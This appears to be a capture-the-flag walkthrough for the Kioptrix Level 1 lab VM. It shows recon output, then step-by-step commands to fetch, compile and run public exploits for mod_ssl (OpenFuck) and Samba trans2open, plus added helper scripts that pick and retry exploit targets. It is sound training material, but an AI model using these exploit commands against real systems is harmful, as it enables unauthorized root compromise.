Kioptrix: Level 1 (#1)

Kioptrix: Level 1 (#1)    https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Flag: Email (the root user's mailbox)

ifconfig
nmap -sn 192.168.1.0/24

Attacker IP: 192.168.1.114   Target IP: 192.168.1.104

See which ports and services are open:

nmap 192.168.1.104 -O -sS -sV -v
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp  open  rpcbind     2 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp  open  ssl/https   Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
1024/tcp open  status      1 (RPC #100024)
MAC Address: 00:0C:29:46:21:38 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.013 days (since Mon May 11 22:17:03 2020)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros

Enumerate web paths; nothing exploitable turned up:

dirb http://192.168.1.104/

Scan for known vulnerabilities:

nikto -h 192.168.1.104

+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.


Exploit-DB has a PoC for this (OpenFuckV2): https://www.exploit-db.com/exploits/47080

wget -O 47080.c https://www.exploit-db.com/download/47080

Build prerequisite (the exploit links against libcrypto):

apt-get install libssl-dev

Compile:

gcc -o exp 47080.c -lcrypto

Running it with no arguments prints the target list; we need the entry matching the banner, Red-Hat/Linux Apache/1.3.20:

./exp
./exp | grep apache-1.3.20

Two entries match, 0x6a and 0x6b. In testing 0x6a did not work; 0x6b did (-c sets the number of connections the exploit opens):

./exp 0x6b 192.168.1.104 -c 40
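Because more than one target entry matched and only the second one worked, it is easier to let a small wrapper pick every candidate from the exploit's own listing and try them in order. The script below is an added example written for this edit, not code from the original walkthrough or from the exploit; it assumes `./exp` is EDB-ID 47080 compiled as shown above, and the target listing it parses is a constructed sample in that listing's layout (the two RedHat 7.2 entries are the ones found here, the other two lines are placeholders).

```shell
#!/bin/sh
# Added example, not from the original walkthrough: select the OpenFuck
# target IDs whose description matches the banner nmap reported, then try
# them in order instead of guessing one. Assumes "./exp" is EDB-ID 47080
# compiled as the page shows.

# Constructed sample of the "./exp" target listing. The two RedHat 7.2 /
# apache-1.3.20 entries are the ones this page found; the other lines are
# placeholders in the same layout, not real entries from the exploit.
TARGETS='    0x01 - Placeholder Linux 1.0 (apache-1.3.19)
    0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
    0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
    0x7f - Placeholder Linux 2.0 (apache-1.3.20)'

# select_targets DISTRO APACHE_VERSION
# Prints the IDs of every entry that mentions both strings, one per line,
# in listing order (the order you would try them).
select_targets() {
    printf '%s\n' "$TARGETS" | awk -v d="$1" -v v="$2" \
        'index($0, d) && index($0, "apache-" v) { print $1 }'
}

# try_targets HOST
# Runs the exploit once per candidate with the same 40 connections the
# page used. Assumption: ./exp exits non-zero when no shell came back, so
# the loop moves on to the next ID and stops at a working one (0x6b here).
try_targets() {
    host=$1
    for id in $(select_targets RedHat 1.3.20); do
        echo "[*] trying target $id against $host"
        ./exp "$id" "$host" -c 40 && break
    done
}

# Selection only; run "try_targets 192.168.1.104" against the lab VM.
select_targets RedHat 1.3.20
```

The selection is plain text matching on the listing, so it works for any distro/version pair the exploit knows about; the retry loop is only as reliable as the exploit's exit status, which is why that is marked as an assumption.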

Once the shell comes back we are already root: after the initial apache-user shell the exploit fetches and runs the ptrace-kmod local privilege escalation.

whoami
cat /etc/*-release
uname -a
mail
1
exit
Message 1:
From root  Sat Sep 26 11:42:10 2009
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2

If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Method two

Samba is listening on port 139 but nmap did not report a version, so query it with the msfconsole smb_version scanner:

msfconsole
search smb_version
use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.1.104
set threads 50
run

The version comes back as Samba 2.2.1a.

Connect to SMB anonymously and list the shares:

smbclient -L 192.168.1.104 -N

Searching https://www.exploit-db.com/ turns up "Samba < 2.2.8 (Linux/BSD) - Remote Code Execution" (EDB-ID 10, the trans2open overflow), which covers 2.2.1a:
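Both findings on this box came down to a version comparison: mod_ssl/2.8.4 against the nikto note that 2.8.7 and lower are affected, and Samba 2.2.1a against the < 2.2.8 bound above. The script below is an added example written for this edit (not from the original walkthrough) that makes those comparisons numeric rather than eyeballed; the scan excerpt is constructed from the banners shown on this page, and the thresholds are the ones the page cites.

```shell
#!/bin/sh
# Added example, not from the original walkthrough: numeric version triage
# for the two banners found on this box.
#   mod_ssl: affected when <= 2.8.7 (CVE-2002-0082, the nikto finding)
#   Samba:   affected when <  2.2.8 (trans2open, EDB-ID 10)

# Keep only digits and dots, so "2.2.1a" compares as 2.2.1 (the letter
# suffix does not move the version across either threshold above).
ver_norm() {
    printf '%s' "$1" | sed 's/[^0-9.]//g'
}

# Compare two dotted versions field by field; prints -1, 0 or 1.
# Missing trailing fields count as 0, so 2.8 == 2.8.0.
ver_cmp() {
    awk -v a="$(ver_norm "$1")" -v b="$(ver_norm "$2")" 'BEGIN {
        na = split(a, A, "."); nb = split(b, B, ".")
        n = (na > nb) ? na : nb
        for (i = 1; i <= n; i++) {
            x = (i <= na) ? A[i] + 0 : 0
            y = (i <= nb) ? B[i] + 0 : 0
            if (x < y) { print "-1"; exit }
            if (x > y) { print "1"; exit }
        }
        print "0"
    }'
}

# check_banner SERVICE VERSION
# Returns 0 and prints a VULN line when VERSION is inside the affected
# range for SERVICE; otherwise prints "ok" and returns 1.
check_banner() {
    case "$1" in
        mod_ssl)
            if [ "$(ver_cmp "$2" 2.8.7)" -le 0 ]; then
                echo "VULN mod_ssl/$2 is <= 2.8.7: CVE-2002-0082 (EDB-ID 47080)"
                return 0
            fi ;;
        samba)
            if [ "$(ver_cmp "$2" 2.2.8)" -lt 0 ]; then
                echo "VULN Samba $2 is < 2.2.8: trans2open (EDB-ID 10)"
                return 0
            fi ;;
    esac
    echo "ok $1 $2"
    return 1
}

# Constructed excerpt: the two banners from this page's nmap scan, with the
# Samba version that smb_version reported spliced into the 139/tcp line.
SCAN='80/tcp   open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
139/tcp  open  netbios-ssn Samba smbd 2.2.1a (workgroup: MYGROUP)'

# Extract the version from each banner and run it through check_banner.
triage_scan() {
    printf '%s\n' "$SCAN" | while IFS= read -r line; do
        case "$line" in
            *mod_ssl/*)
                v=$(printf '%s' "$line" | sed 's|.*mod_ssl/\([0-9.]*\).*|\1|')
                check_banner mod_ssl "$v" ;;
            *'Samba smbd '*)
                v=$(printf '%s' "$line" | sed 's|.*Samba smbd \([0-9.a-z]*\).*|\1|')
                check_banner samba "$v" ;;
        esac
    done
}

triage_scan
```

Field-by-field comparison matters here: a plain string compare would rank 2.10 below 2.9, and the stripped letter suffix is why "2.2.1a" lands on the vulnerable side of 2.2.8 rather than failing the integer test.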

Download, compile, run (-b 0 selects the Linux platform):

wget -O t.c https://www.exploit-db.com/download/10
gcc -o tt t.c
./tt -b 0 192.168.1.104
whoami

Metasploit's trans2open module covers the same bug:

msfconsole
search samba
use exploit/linux/samba/trans2open
options
set rhost 192.168.1.104
run


posted @ 2020-05-12 20:33 by 你认识小哀吗